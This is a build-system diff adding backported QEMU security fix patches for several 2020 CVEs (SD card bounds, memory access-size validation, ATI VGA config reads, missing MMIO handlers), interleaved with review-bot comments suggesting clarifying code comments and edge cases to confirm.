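+@@ -1188,13 +1190,15 @@ static sd_rsp_type_t sd_normal_command(SDState *sd, SDRequest req)
+ case 18: /* CMD18: READ_MULTIPLE_BLOCK */
+ switch (sd->state) {
+ case sd_transfer_state:
+- sd->state = sd_sendingdata_state;
+- sd->data_start = addr;
+- sd->data_offset = 0;
+
+- if (sd->data_start + sd->blk_len > sd->size) {
++ if (addr + sd->blk_len > sd->size) {
+ sd->card_status |= ADDRESS_ERROR;
++ return sd_r1;
+ }
++
++ sd->state = sd_sendingdata_state;
++ sd->data_start = addr;
++ sd->data_offset = 0;
+ return sd_r1;
+
+ default:
+@@ -1234,14 +1238,17 @@ static sd_rsp_type_t sd_normal_command(SDState *sd, SDRequest req)
+ /* Writing in SPI mode not implemented. */
+ if (sd->spi)
+ break;
++
++ if (addr + sd->blk_len > sd->size) {
++ sd->card_status |= ADDRESS_ERROR;
++ return sd_r1;
++ }
++
+ sd->state = sd_receivingdata_state;
+ sd->data_start = addr;
+ sd->data_offset = 0;
+ sd->blk_written = 0;
+
+- if (sd->data_start + sd->blk_len > sd->size) {
+- sd->card_status |= ADDRESS_ERROR;
+- }
+ if (sd_wp_addr(sd, sd->data_start)) {
+ sd->card_status |= WP_VIOLATION;
+ }
+@@ -1261,14 +1268,17 @@ static sd_rsp_type_t sd_normal_command(SDState *sd, SDRequest req)
+ /* Writing in SPI mode not implemented. */
+ if (sd->spi)
+ break;
++
++ if (addr + sd->blk_len > sd->size) {
++ sd->card_status |= ADDRESS_ERROR;
++ return sd_r1;
++ }
++
+ sd->state = sd_receivingdata_state;
+ sd->data_start = addr;
+ sd->data_offset = 0;
+ sd->blk_written = 0;
+
+- if (sd->data_start + sd->blk_len > sd->size) {
+- sd->card_status |= ADDRESS_ERROR;
+- }
+ if (sd_wp_addr(sd, sd->data_start)) {
+ sd->card_status |= WP_VIOLATION;
+ }
+--
+2.32.0
+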
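Review bot: Nothing in the code records that the `addr + sd->blk_len > sd->size` test must run before `sd->state` is changed, although that ordering is the whole fix in the CMD17, CMD18 and two write cases. A comment above each check, such as `/* Reject before changing state: no transfer may start on ADDRESS_ERROR */`, would keep a later cleanup from moving it back. Only the first block of a multi-block command is validated here, so the bound on later blocks presumably lives in sd_read_data() and sd_write_data(), which this patch does not touch. Whether the sum can wrap depends on the types of `addr` and `sd->blk_len`, which are declared outside the hunks, and both points are worth confirming against the patched tree. sd_normal_command() starts and ends outside every hunk.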
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_5.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_5.patch
new file mode 100644
index 0000000000..ffce610f79
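--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_5.patch
@@ -0,0 +1,54 @@
+From 9157dd597d293ab7f599f4d96c3fe8a6e07c633d Mon Sep 17 00:00:00 2001
+From: =?utf8?q?Philippe=20Mathieu-Daud=C3=A9?= <f4bug@amsat.org>
+Date: Wed, 3 Jun 2020 19:59:16 +0200
+Subject: [PATCH] hw/sd/sdcard: Restrict Class 6 commands to SCSD cards
+MIME-Version: 1.0
+Content-Type: text/plain; charset=utf8
+Content-Transfer-Encoding: 8bit
+
+Only SCSD cards support Class 6 (Block Oriented Write Protection)
+commands.
+
+ "SD Specifications Part 1 Physical Layer Simplified Spec. v3.01"
+
+ 4.3.14 Command Functional Difference in Card Capacity Types
+
+ * Write Protected Group
+
+ SDHC and SDXC do not support write-protected groups. Issuing
+ CMD28, CMD29 and CMD30 generates the ILLEGAL_COMMAND error.
+
+Cc: qemu-stable@nongnu.org
+Reviewed-by: Peter Maydell <peter.maydell@linaro.org>
+Signed-off-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+Reviewed-by: Alistair Francis <alistair.francis@wdc.com>
+Message-Id: <20200630133912.9428-7-f4bug@amsat.org>
+
+Upstram-Status: Backport:
+https://git.qemu.org/?p=qemu.git;a=commit;h=9157dd597d293ab7f599f4d96c3fe8a6e07c633d
+
+CVE: CVE-2020-13253
+
+Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
+---
+ hw/sd/sd.c | 5 +++++
+ 1 file changed, 5 insertions(+)
+
+diff --git a/hw/sd/sd.c b/hw/sd/sd.c
+index 5137168..1cc16bf 100644
+--- a/hw/sd/sd.c
++++ b/hw/sd/sd.c
+@@ -920,6 +920,11 @@ static sd_rsp_type_t sd_normal_command(SDState *sd, SDRequest req)
+ sd->multi_blk_cnt = 0;
+ }
+
++ if (sd_cmd_class[req.cmd] == 6 && FIELD_EX32(sd->ocr, OCR, CARD_CAPACITY)) {
++ /* Only Standard Capacity cards support class 6 commands */
++ return sd_illegal;
++ }
++
+ switch (req.cmd) {
+ /* Basic commands (Class 0 and Class 1) */
+ case 0: /* CMD0: GO_IDLE_STATE */
+--
+1.8.3.1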
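Review bot: `sd_cmd_class[req.cmd]` is indexed with a value taken from the request, and no bound on `req.cmd` is visible in this hunk. Confirm that the command index is limited to the size of `sd_cmd_class` before sd_normal_command() reaches the added test. The literal `6` would be easier to audit with the class named next to it, for example `/* Class 6: block oriented write protection (CMD28, CMD29, CMD30) */`. The function body continues outside the hunk.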
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-13754-1.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-13754-1.patch
new file mode 100644
index 0000000000..fdfff9d81d
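--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-13754-1.patch
@@ -0,0 +1,91 @@
+From 5d971f9e672507210e77d020d89e0e89165c8fc9 Mon Sep 17 00:00:00 2001
+From: "Michael S. Tsirkin" <mst@redhat.com>
+Date: Wed, 10 Jun 2020 09:47:49 -0400
+Subject: [PATCH] memory: Revert "memory: accept mismatching sizes in
+ memory_region_access_valid"
+
+Memory API documentation documents valid .min_access_size and .max_access_size
+fields and explains that any access outside these boundaries is blocked.
+
+This is what devices seem to assume.
+
+However this is not what the implementation does: it simply
+ignores the boundaries unless there's an "accepts" callback.
+
+Naturally, this breaks a bunch of devices.
+
+Revert to the documented behaviour.
+
+Devices that want to allow any access can just drop the valid field,
+or add the impl field to have accesses converted to appropriate
+length.
+
+Cc: qemu-stable@nongnu.org
+Reviewed-by: Richard Henderson <rth@twiddle.net>
+Fixes: CVE-2020-13754
+Fixes: https://bugzilla.redhat.com/show_bug.cgi?id=1842363
+Fixes: a014ed07bd5a ("memory: accept mismatching sizes in memory_region_access_valid")
+Signed-off-by: Michael S. Tsirkin <mst@redhat.com>
+Message-Id: <20200610134731.1514409-1-mst@redhat.com>
+Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
+
+https://git.qemu.org/?p=qemu.git;a=patch;h=5d971f9e672507210e77d020d89e0e89165c8fc9
+CVE: CVE-2020-13754
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ memory.c | 29 +++++++++--------------------
+ 1 file changed, 9 insertions(+), 20 deletions(-)
+
+diff --git a/memory.c b/memory.c
+index 2f15a4b..9200b20 100644
+--- a/memory.c
++++ b/memory.c
+@@ -1352,35 +1352,24 @@ bool memory_region_access_valid(MemoryRegion *mr,
+ bool is_write,
+ MemTxAttrs attrs)
+ {
+- int access_size_min, access_size_max;
+- int access_size, i;
+-
+- if (!mr->ops->valid.unaligned && (addr & (size - 1))) {
++ if (mr->ops->valid.accepts
++ && !mr->ops->valid.accepts(mr->opaque, addr, size, is_write, attrs)) {
+ return false;
+ }
+
+- if (!mr->ops->valid.accepts) {
+- return true;
+- }
+-
+- access_size_min = mr->ops->valid.min_access_size;
+- if (!mr->ops->valid.min_access_size) {
+- access_size_min = 1;
++ if (!mr->ops->valid.unaligned && (addr & (size - 1))) {
++ return false;
+ }
+
+- access_size_max = mr->ops->valid.max_access_size;
++ /* Treat zero as compatibility all valid */
+ if (!mr->ops->valid.max_access_size) {
+- access_size_max = 4;
++ return true;
+ }
+
+- access_size = MAX(MIN(size, access_size_max), access_size_min);
+- for (i = 0; i < size; i += access_size) {
+- if (!mr->ops->valid.accepts(mr->opaque, addr + i, access_size,
+- is_write, attrs)) {
+- return false;
+- }
++ if (size > mr->ops->valid.max_access_size
++ || size < mr->ops->valid.min_access_size) {
++ return false;
+ }
+-
+ return true;
+ }
+
+--
+1.8.3.1
+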
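Review bot: The early `return true` for `!mr->ops->valid.max_access_size` runs before the size comparison, so a region that sets only `.valid.min_access_size` gets no size check at all, and a region that sets neither field stays unchecked as before. The one-line comment does not say this; something like `/* Zero max_access_size means no size limit is enforced, min_access_size included */` would tell device authors that declaring only a lower bound protects nothing. Every device model built into this image now has its `.valid` range enforced, and the CVE-2020-13754-2 to -4 patches adjust only the four devices they name, so other models that declare a `.valid` range are worth auditing. The signature of memory_region_access_valid() starts outside the hunk.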
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-13754-2.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-13754-2.patch
new file mode 100644
index 0000000000..7354edc54d
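--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-13754-2.patch
@@ -0,0 +1,69 @@
+From dba04c3488c4699f5afe96f66e448b1d447cf3fb Mon Sep 17 00:00:00 2001
+From: Michael Tokarev <mjt@tls.msk.ru>
+Date: Mon, 20 Jul 2020 19:06:27 +0300
+Subject: [PATCH] acpi: accept byte and word access to core ACPI registers
+
+All ISA registers should be accessible as bytes, words or dwords
+(if wide enough). Fix the access constraints for acpi-pm-evt,
+acpi-pm-tmr & acpi-cnt registers.
+
+Fixes: 5d971f9e67 (memory: Revert "memory: accept mismatching sizes in memory_region_access_valid")
+Fixes: afafe4bbe0 (apci: switch cnt to memory api)
+Fixes: 77d58b1e47 (apci: switch timer to memory api)
+Fixes: b5a7c024d2 (apci: switch evt to memory api)
+Buglink: https://lore.kernel.org/xen-devel/20200630170913.123646-1-anthony.perard@citrix.com/T/
+Buglink: https://bugs.debian.org/964793
+BugLink: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=964247
+BugLink: https://bugs.launchpad.net/bugs/1886318
+Reported-By: Simon John <git@the-jedi.co.uk>
+Signed-off-by: Michael Tokarev <mjt@tls.msk.ru>
+Message-Id: <20200720160627.15491-1-mjt@msgid.tls.msk.ru>
+Cc: qemu-stable@nongnu.org
+Reviewed-by: Michael S. Tsirkin <mst@redhat.com>
+Signed-off-by: Michael S. Tsirkin <mst@redhat.com>
+
+https://git.qemu.org/?p=qemu.git;a=patch;h=dba04c3488c4699f5afe96f66e448b1d447cf3fb
+CVE: CVE-2020-13754
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/acpi/core.c | 9 ++++++---
+ 1 file changed, 6 insertions(+), 3 deletions(-)
+
+diff --git a/hw/acpi/core.c b/hw/acpi/core.c
+index f6d9ec4..ac06db3 100644
+--- a/hw/acpi/core.c
++++ b/hw/acpi/core.c
+@@ -458,7 +458,8 @@ static void acpi_pm_evt_write(void *opaque, hwaddr addr, uint64_t val,
+ static const MemoryRegionOps acpi_pm_evt_ops = {
+ .read = acpi_pm_evt_read,
+ .write = acpi_pm_evt_write,
+- .valid.min_access_size = 2,
++ .impl.min_access_size = 2,
++ .valid.min_access_size = 1,
+ .valid.max_access_size = 2,
+ .endianness = DEVICE_LITTLE_ENDIAN,
+ };
+@@ -527,7 +528,8 @@ static void acpi_pm_tmr_write(void *opaque, hwaddr addr, uint64_t val,
+ static const MemoryRegionOps acpi_pm_tmr_ops = {
+ .read = acpi_pm_tmr_read,
+ .write = acpi_pm_tmr_write,
+- .valid.min_access_size = 4,
++ .impl.min_access_size = 4,
++ .valid.min_access_size = 1,
+ .valid.max_access_size = 4,
+ .endianness = DEVICE_LITTLE_ENDIAN,
+ };
+@@ -599,7 +601,8 @@ static void acpi_pm_cnt_write(void *opaque, hwaddr addr, uint64_t val,
+ static const MemoryRegionOps acpi_pm_cnt_ops = {
+ .read = acpi_pm_cnt_read,
+ .write = acpi_pm_cnt_write,
+- .valid.min_access_size = 2,
++ .impl.min_access_size = 2,
++ .valid.min_access_size = 1,
+ .valid.max_access_size = 2,
+ .endianness = DEVICE_LITTLE_ENDIAN,
+ };
+--
+1.8.3.1
+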
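Review bot: With `.valid.min_access_size = 1` and an `.impl.min_access_size` of 2 or 4, a one-byte guest access to these registers is now widened before it reaches the handler. Whether a byte write is merged with the current register contents or arrives in acpi_pm_evt_write(), acpi_pm_tmr_write() and acpi_pm_cnt_write() as a full-width value is decided outside these hunks and should be confirmed, because a widened write that zeroes the neighbouring byte would change enable or control bits. A short comment on each table, e.g. `/* guests may use byte access; the core widens it to the .impl size */`, would record the intent.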
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-13754-3.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-13754-3.patch
new file mode 100644
index 0000000000..2a8781050f
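--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-13754-3.patch
@@ -0,0 +1,65 @@
+From 8e67fda2dd6202ccec093fda561107ba14830a17 Mon Sep 17 00:00:00 2001
+From: Laurent Vivier <lvivier@redhat.com>
+Date: Tue, 21 Jul 2020 10:33:22 +0200
+Subject: [PATCH] xhci: fix valid.max_access_size to access address registers
+MIME-Version: 1.0
+Content-Type: text/plain; charset=utf8
+Content-Transfer-Encoding: 8bit
+
+QEMU XHCI advertises AC64 (64-bit addressing) but doesn't allow
+64-bit mode access in "runtime" and "operational" MemoryRegionOps.
+
+Set the max_access_size based on sizeof(dma_addr_t) as AC64 is set.
+
+XHCI specs:
+"If the xHC supports 64-bit addressing (AC64 = â1â), then software
+should write 64-bit registers using only Qword accesses. If a
+system is incapable of issuing Qword accesses, then writes to the
+64-bit address fields shall be performed using 2 Dword accesses;
+low Dword-first, high-Dword second. If the xHC supports 32-bit
+addressing (AC64 = â0â), then the high Dword of registers containing
+64-bit address fields are unused and software should write addresses
+using only Dword accesses"
+
+The problem has been detected with SLOF, as linux kernel always accesses
+registers using 32-bit access even if AC64 is set and revealed by
+5d971f9e6725 ("memory: Revert "memory: accept mismatching sizes in memory_region_access_valid"")
+
+Suggested-by: Alexey Kardashevskiy <aik@au1.ibm.com>
+Signed-off-by: Laurent Vivier <lvivier@redhat.com>
+Message-id: 20200721083322.90651-1-lvivier@redhat.com
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+
+https://git.qemu.org/?p=qemu.git;a=patch;h=8e67fda2dd6202ccec093fda561107ba14830a17
+CVE: CVE-2020-13754
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/usb/hcd-xhci.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/hw/usb/hcd-xhci.c b/hw/usb/hcd-xhci.c
+index b330e36..67a18fe 100644
+--- a/hw/usb/hcd-xhci.c
++++ b/hw/usb/hcd-xhci.c
+@@ -3184,7 +3184,7 @@ static const MemoryRegionOps xhci_oper_ops = {
+ .read = xhci_oper_read,
+ .write = xhci_oper_write,
+ .valid.min_access_size = 4,
+- .valid.max_access_size = 4,
++ .valid.max_access_size = sizeof(dma_addr_t),
+ .endianness = DEVICE_LITTLE_ENDIAN,
+ };
+
+@@ -3200,7 +3200,7 @@ static const MemoryRegionOps xhci_runtime_ops = {
+ .read = xhci_runtime_read,
+ .write = xhci_runtime_write,
+ .valid.min_access_size = 4,
+- .valid.max_access_size = 4,
++ .valid.max_access_size = sizeof(dma_addr_t),
+ .endianness = DEVICE_LITTLE_ENDIAN,
+ };
+
+--
+1.8.3.1
+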
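Review bot: `.valid.max_access_size` now admits accesses wider than a dword to xhci_oper_ops and xhci_runtime_ops, but neither table sets `.impl.max_access_size`. How such an access reaches xhci_oper_read(), xhci_oper_write() and the runtime handlers therefore depends on the memory core's default, which is not visible here. If the handlers only understand 32-bit registers, adding `.impl.max_access_size = 4,` to both tables would state that explicitly instead of relying on the default. `sizeof(dma_addr_t)` also ties a guest-visible register width to a typedef defined elsewhere, so a comment naming AC64 next to it would help the next reader. The same handler-width question applies to the `.max_access_size = 8` change in CVE-2020-13754-4.patch.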
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-13754-4.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-13754-4.patch
new file mode 100644
index 0000000000..6bad07d03f
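--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-13754-4.patch
@@ -0,0 +1,39 @@
+From 70b78d4e71494c90d2ccb40381336bc9b9a22f79 Mon Sep 17 00:00:00 2001
+From: Alistair Francis <alistair.francis@wdc.com>
+Date: Tue, 30 Jun 2020 13:12:11 -0700
+Subject: [PATCH] hw/riscv: Allow 64 bit access to SiFive CLINT
+
+Commit 5d971f9e672507210e77d020d89e0e89165c8fc9
+"memory: Revert "memory: accept mismatching sizes in
+memory_region_access_valid"" broke most RISC-V boards as they do 64 bit
+accesses to the CLINT and QEMU would trigger a fault. Fix this failure
+by allowing 8 byte accesses.
+
+Signed-off-by: Alistair Francis <alistair.francis@wdc.com>
+Reviewed-by: LIU Zhiwei<zhiwei_liu@c-sky.com>
+Message-Id: <122b78825b077e4dfd39b444d3a46fe894a7804c.1593547870.git.alistair.francis@wdc.com>
+
+https://git.qemu.org/?p=qemu.git;a=patch;h=70b78d4e71494c90d2ccb40381336bc9b9a22f79
+CVE: CVE-2020-13754
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/riscv/sifive_clint.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/hw/riscv/sifive_clint.c b/hw/riscv/sifive_clint.c
+index b11ffa0..669c21a 100644
+--- a/hw/riscv/sifive_clint.c
++++ b/hw/riscv/sifive_clint.c
+@@ -181,7 +181,7 @@ static const MemoryRegionOps sifive_clint_ops = {
+ .endianness = DEVICE_LITTLE_ENDIAN,
+ .valid = {
+ .min_access_size = 4,
+- .max_access_size = 4
++ .max_access_size = 8
+ }
+ };
+
+--
+1.8.3.1
+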
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-13791.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-13791.patch
new file mode 100644
index 0000000000..1e8278f7b7
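--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-13791.patch
@@ -0,0 +1,44 @@
+Date: Thu, 4 Jun 2020 16:25:24 +0530
+From: Prasad J Pandit <pjp@fedoraproject.org>
+Subject: [PATCH v3] ati-vga: check address before reading configuration bytes (CVE-2020-13791)
+
+While reading PCI configuration bytes, a guest may send an
+address towards the end of the configuration space. It may lead
+to an OOB access issue. Add check to ensure 'address + size' is
+within PCI configuration space.
+
+CVE: CVE-2020-13791
+
+Upstream-Status: Submitted
+https://lists.gnu.org/archive/html/qemu-devel/2020-06/msg00979.html
+
+Reported-by: Ren Ding <rding@gatech.edu>
+Reported-by: Hanqing Zhao <hanqing@gatech.edu>
+Reported-by: Yi Ren <c4tren@gmail.com>
+Suggested-by: BALATON Zoltan <balaton@eik.bme.hu>
+Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
+Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
+---
+ hw/display/ati.c | 4 +++-
+ 1 file changed, 3 insertions(+), 1 deletion(-)
+
+Update v3: avoid modifying 'addr' variable
+ -> https://lists.gnu.org/archive/html/qemu-devel/2020-06/msg00834.html
+
+diff --git a/hw/display/ati.c b/hw/display/ati.c
+index 67604e68de..b4d0fd88b7 100644
+--- a/hw/display/ati.c
++++ b/hw/display/ati.c
+@@ -387,7 +387,9 @@ static uint64_t ati_mm_read(void *opaque, hwaddr addr, unsigned int size)
+ val = s->regs.crtc_pitch;
+ break;
+ case 0xf00 ... 0xfff:
+- val = pci_default_read_config(&s->dev, addr - 0xf00, size);
++ if ((addr - 0xf00) + size <= pci_config_size(&s->dev)) {
++ val = pci_default_read_config(&s->dev, addr - 0xf00, size);
++ }
+ break;
+ case CUR_OFFSET:
+ val = s->regs.cur_offset;
+--
+2.26.2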
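Review bot: When the new bound check fails, the `case 0xf00 ... 0xfff` branch reaches `break` without assigning `val`, so an out-of-range read returns whatever `val` held before the switch. Its initialisation in ati_mm_read() is outside the hunk and should be confirmed, or the branch can be made self-contained with `} else { val = 0; }`. The header says `Upstream-Status: Submitted`, so this is a mailing-list version rather than a merged commit, and it is worth checking whether upstream later took a different form of the fix.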
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-1.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-1.patch
new file mode 100644
index 0000000000..20f39f0a26
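--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-1.patch
@@ -0,0 +1,50 @@
+From 520f26fc6d17b71a43eaf620e834b3bdf316f3d3 Mon Sep 17 00:00:00 2001
+From: Prasad J Pandit <pjp@fedoraproject.org>
+Date: Tue, 11 Aug 2020 17:11:25 +0530
+Subject: [PATCH] hw/pci-host: add pci-intack write method
+
+Add pci-intack mmio write method to avoid NULL pointer dereference
+issue.
+
+Reported-by: Lei Sun <slei.casper@gmail.com>
+Reviewed-by: Li Qiang <liq3ea@gmail.com>
+Reviewed-by: Peter Maydell <peter.maydell@linaro.org>
+Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
+Message-Id: <20200811114133.672647-2-ppandit@redhat.com>
+Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
+
+CVE: CVE-2020-15469
+Upstream-Status: Backport [import from ubuntu
+https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2020-15469-1.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/qemu/qemu/commit/520f26fc6d17b71a43eaf620e834b3bdf316f3d3 ]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/pci-host/prep.c | 8 ++++++++
+ 1 file changed, 8 insertions(+)
+
+--- a/hw/pci-host/prep.c
++++ b/hw/pci-host/prep.c
+@@ -26,6 +26,7 @@
+ #include "qemu/osdep.h"
+ #include "qemu-common.h"
+ #include "qemu/units.h"
++#include "qemu/log.h"
+ #include "qapi/error.h"
+ #include "hw/pci/pci.h"
+ #include "hw/pci/pci_bus.h"
+@@ -119,8 +120,15 @@ static uint64_t raven_intack_read(void *
+ return pic_read_irq(isa_pic);
+ }
+
++static void raven_intack_write(void *opaque, hwaddr addr,
++ uint64_t data, unsigned size)
++{
++ qemu_log_mask(LOG_UNIMP, "%s not implemented\n", __func__);
++}
++
+ static const MemoryRegionOps raven_intack_ops = {
+ .read = raven_intack_read,
++ .write = raven_intack_write,
+ .valid = {
+ .max_access_size = 1,
+ },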
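Review bot: raven_intack_write() drops the write and logs only the function name, so a log line cannot show which address or value the guest used. Including them, e.g. `qemu_log_mask(LOG_UNIMP, "%s: write 0x%" PRIx64 " at 0x%" HWADDR_PRIx " ignored\n", __func__, data, addr);`, makes a misbehaving guest easier to triage. The write stubs added in CVE-2020-15469-3.patch and CVE-2020-15469-4.patch have the same shape. The series also logs under LOG_UNIMP in some stubs and LOG_GUEST_ERROR in others, so a one-line comment in each saying why the access is ignored would explain the choice.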
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-2.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-2.patch
new file mode 100644
index 0000000000..d6715d337c
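--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-2.patch
@@ -0,0 +1,69 @@
+From 4f2a5202a05fc1612954804a2482f07bff105ea2 Mon Sep 17 00:00:00 2001
+From: Prasad J Pandit <pjp@fedoraproject.org>
+Date: Tue, 11 Aug 2020 17:11:26 +0530
+Subject: [PATCH] pci-host: designware: add pcie-msi read method
+
+Add pcie-msi mmio read method to avoid NULL pointer dereference
+issue.
+
+Reported-by: Lei Sun <slei.casper@gmail.com>
+Reviewed-by: Li Qiang <liq3ea@gmail.com>
+Reviewed-by: Peter Maydell <peter.maydell@linaro.org>
+Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
+Message-Id: <20200811114133.672647-3-ppandit@redhat.com>
+Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
+
+CVE: CVE-2020-15469
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2020-15469-2.patch?h=ubuntu/focal-security Upstream Commit https://github.com/qemu/qemu/commit/4f2a5202a05fc1612954804a2482f07bff105ea2]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/pci-host/designware.c | 19 +++++++++++++++++++
+ 1 file changed, 19 insertions(+)
+
+diff --git a/hw/pci-host/designware.c b/hw/pci-host/designware.c
+index f9fb97a..bde3a34 100644
+--- a/hw/pci-host/designware.c
++++ b/hw/pci-host/designware.c
+@@ -21,6 +21,7 @@
+ #include "qemu/osdep.h"
+ #include "qapi/error.h"
+ #include "qemu/module.h"
++#include "qemu/log.h"
+ #include "hw/pci/msi.h"
+ #include "hw/pci/pci_bridge.h"
+ #include "hw/pci/pci_host.h"
+@@ -63,6 +64,23 @@ designware_pcie_root_to_host(DesignwarePCIERoot *root)
+ return DESIGNWARE_PCIE_HOST(bus->parent);
+ }
+
++static uint64_t designware_pcie_root_msi_read(void *opaque, hwaddr addr,
++ unsigned size)
++{
++ /*
++ * Attempts to read from the MSI address are undefined in
++ * the PCI specifications. For this hardware, the datasheet
++ * specifies that a read from the magic address is simply not
++ * intercepted by the MSI controller, and will go out to the
++ * AHB/AXI bus like any other PCI-device-initiated DMA read.
++ * This is not trivial to implement in QEMU, so since
++ * well-behaved guests won't ever ask a PCI device to DMA from
++ * this address we just log the missing functionality.
++ */
++ qemu_log_mask(LOG_UNIMP, "%s not implemented\n", __func__);
++ return 0;
++}
++
+ static void designware_pcie_root_msi_write(void *opaque, hwaddr addr,
+ uint64_t val, unsigned len)
+ {
+@@ -77,6 +95,7 @@ static void designware_pcie_root_msi_write(void *opaque, hwaddr addr,
+ }
+
+ static const MemoryRegionOps designware_pci_host_msi_ops = {
++ .read = designware_pcie_root_msi_read,
+ .write = designware_pcie_root_msi_write,
+ .endianness = DEVICE_LITTLE_ENDIAN,
+ .valid = {
+--
+1.8.3.1
+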
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-3.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-3.patch
new file mode 100644
index 0000000000..85abe8ff32
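--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-3.patch
@@ -0,0 +1,49 @@
+From 24202d2b561c3b4c48bd28383c8c34b4ac66c2bf Mon Sep 17 00:00:00 2001
+From: Prasad J Pandit <pjp@fedoraproject.org>
+Date: Tue, 11 Aug 2020 17:11:27 +0530
+Subject: [PATCH] vfio: add quirk device write method
+
+Add vfio quirk device mmio write method to avoid NULL pointer
+dereference issue.
+
+Reported-by: Lei Sun <slei.casper@gmail.com>
+Reviewed-by: Li Qiang <liq3ea@gmail.com>
+Reviewed-by: Peter Maydell <peter.maydell@linaro.org>
+Acked-by: Alex Williamson <alex.williamson@redhat.com>
+Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
+Message-Id: <20200811114133.672647-4-ppandit@redhat.com>
+Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
+
+CVE: CVE-2020-15469
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2020-15469-3.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/24202d2b561c3b4c48bd28383c8c34b4ac66c2bf]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/vfio/pci-quirks.c | 8 ++++++++
+ 1 file changed, 8 insertions(+)
+
+--- a/hw/vfio/pci-quirks.c
++++ b/hw/vfio/pci-quirks.c
+@@ -13,6 +13,7 @@
+ #include "qemu/osdep.h"
+ #include "exec/memop.h"
+ #include "qemu/units.h"
++#include "qemu/log.h"
+ #include "qemu/error-report.h"
+ #include "qemu/main-loop.h"
+ #include "qemu/module.h"
+@@ -278,8 +279,15 @@ static uint64_t vfio_ati_3c3_quirk_read(
+ return data;
+ }
+
++static void vfio_ati_3c3_quirk_write(void *opaque, hwaddr addr,
++ uint64_t data, unsigned size)
++{
++ qemu_log_mask(LOG_GUEST_ERROR, "%s: invalid access\n", __func__);
++}
++
+ static const MemoryRegionOps vfio_ati_3c3_quirk = {
+ .read = vfio_ati_3c3_quirk_read,
++ .write = vfio_ati_3c3_quirk_write,
+ .endianness = DEVICE_LITTLE_ENDIAN,
+ };
+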
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-4.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-4.patch
new file mode 100644
index 0000000000..52fac8a051
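--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-4.patch
@@ -0,0 +1,53 @@
+From f867cebaedbc9c43189f102e4cdfdff05e88df7f Mon Sep 17 00:00:00 2001
+From: Prasad J Pandit <pjp@fedoraproject.org>
+Date: Tue, 11 Aug 2020 17:11:28 +0530
+Subject: [PATCH] prep: add ppc-parity write method
+
+Add ppc-parity mmio write method to avoid NULL pointer dereference
+issue.
+
+Reported-by: Lei Sun <slei.casper@gmail.com>
+Acked-by: David Gibson <david@gibson.dropbear.id.au>
+Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
+Reviewed-by: Li Qiang <liq3ea@gmail.com>
+Message-Id: <20200811114133.672647-5-ppandit@redhat.com>
+Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
+
+CVE: CVE-2020-15469
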